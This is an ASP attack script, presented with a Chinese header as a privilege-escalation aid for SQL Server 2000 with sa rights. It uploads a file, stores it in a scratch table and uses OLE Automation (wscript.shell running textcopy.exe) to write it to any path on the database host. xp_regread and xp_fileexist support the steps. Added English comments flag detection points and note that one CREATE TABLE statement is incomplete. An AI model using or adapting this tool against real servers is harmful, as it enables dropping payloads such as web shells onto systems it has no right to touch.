使用环境：SQL Server 2000，SA 权限，常用提权扩展存在。
原理 :利用textcopy进行二进制导入导出。
ASP 代码如下：
<%
'=============================Code by Bin & BloodSword================
' Page-level driver: reads one multipart file field ("myfile") through the
' upload_5xsoft component together with the SQL Server connection fields
' (sahost/saport/sauser/sapass/sadb) and a server-side destination path
' (savepath), then hands the raw bytes to execsql below.
' NOTE(review): every value here comes directly from the HTTP form. Nothing is
' validated or escaped before it is concatenated into the OLE DB connection
' string (sqlstr) and, inside execsql, into T-SQL text and a command line.
' Defender note: a page that takes database credentials and a filesystem path
' from the client and writes the upload onto the database host is a file-drop
' utility, not an application feature; its presence under a web root should be
' treated as an indicator of compromise (look for the form field names above and
' for the literal "upload_5xsoft" in web content scans).
dim upload,file,formName,formPath,iCount
' formName, formPath and iCount are declared but never used in this file.
set upload=new upload_5xsoft
set file=upload.file("myfile")
savepath = upload.form("savepath")
sahost= upload.form("sahost")
saport = upload.form("saport")
sauser = upload.form("sauser")
sapass = upload.form("sapass")
sadb = upload.form("sadb")
' Only proceeds when a non-empty file was actually posted.
if file.FileSize>0 then
indata = file.infile()
'SQLEXECUTE
' Connection string is built by string concatenation; "server=host,port" is the
' SQLOLEDB form for a TCP endpoint. Credentials travel in clear text from the
' browser to this page and then to the database.
sqlstr = "PROVIDER=SQLOLEDB;server="&sahost&","&saport&";uid="&sauser&";pwd="&sapass&";database="&sadb&""
execsql sqlstr,indata,savepath
end if
set file=nothing
'===============subsql===================
'===============subsql===================
' execsql: stores the uploaded bytes in a scratch table on the SQL Server, then
' uses OLE Automation from inside T-SQL to run textcopy.exe on the database host
' so the blob is written to savepath, and finally checks the file exists.
'   sqlstr   - OLE DB connection string (built from form input by the caller)
'   indata   - raw bytes of the uploaded file
'   savepath - destination path on the SQL Server host, also client-supplied
' Everything below runs with whatever rights the supplied login has; the header
' of this file states it is meant for the sa account.
' Defender notes (detection / hardening points visible in this routine):
'   - xp_regread, sp_oacreate/sp_oamethod and xp_fileexist invoked by a web
'     application login are high-signal audit events; OLE Automation procedures
'     should be disabled and these extended procedures denied to application
'     accounts.
'   - the sp_oamethod 'run' call starts textcopy.exe as a child of the SQL
'     Server service process, with the database user and password on its
'     command line; process-creation logging will record both.
'   - the scratch table is created and dropped within one request, so table
'     DDL auditing is the only persistent trace on the database side.
Sub execsql(sqlstr,indata,savepath)
set conn=server.CreateObject("ADODB.connection")
conn.Open sqlstr
' Remove any leftover scratch table from a previous run.
conn.execute "IF EXISTS (SELECT * FROM sysobjects WHERE name='safile') BEGIN DROP TABLE [safile] END;"
' NOTE(review): as pasted this CREATE TABLE has no column list, so the
' statement shown here is incomplete and would not execute as-is.
conn.execute "CREATE TABLE safile ON [PRIMARY] TEXTIMAGE_ON [PRIMARY];"
set rs=server.createobject("ADODB.recordset")
' Open an empty, updatable recordset over the scratch table
' (CursorType 1 = adOpenKeyset, LockType 3 = adLockOptimistic).
rs.Open "SELECT * FROM safile where id is null",conn,1,3
rs.addnew
' Writes the uploaded bytes into the blob column of the new row.
rs("safile").appendchunk indata
rs.update
'===============update end==========
' Reads the SQL Server installation directory from the registry via xp_regread;
' rs(1) is the returned data column. The open recordset above is replaced here
' without being closed first.
set rs = conn.execute("EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Setup', 'SQLPath'")
regpath = rs(1)
' Builds a T-SQL batch that creates a WScript.Shell object through OLE
' Automation and calls its Run method, so textcopy.exe from the server's Binn
' directory exports the blob column (/C safile) of table safile (/T safile) to
' savepath (/F). Host, user, password and database from the form are placed on
' the command line unescaped, as is savepath.
sql="declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'"""&(regpath)&"\Binn\textcopy.exe"" /S "&sahost&" /U "&sauser&" /P "&sapass&" /D "&sadb&" /T safile /C safile /W true /F """&savepath&""" /O',0,1"
conn.execute(sql)
' Drops the scratch table again so no data is left behind in the database.
conn.execute "IF EXISTS (SELECT * FROM sysobjects WHERE name='safile') BEGIN DROP TABLE [safile] END;"
' Verifies the write by asking the server whether savepath now exists
' (xp_fileexist's first column is 1 when the file is present).
set rs =conn.execute("EXECUTE master..xp_fileexist '"&savepath&"'")
'============
if rs(0)=1 then
response.write "OK ! Good Luck ! :)"
else
response.write "Sorry ! Bad Luck ! ):"
end if
' Objects are released without an explicit rs.Close / conn.Close.
set rs = nothing
set conn = nothing
end sub
%>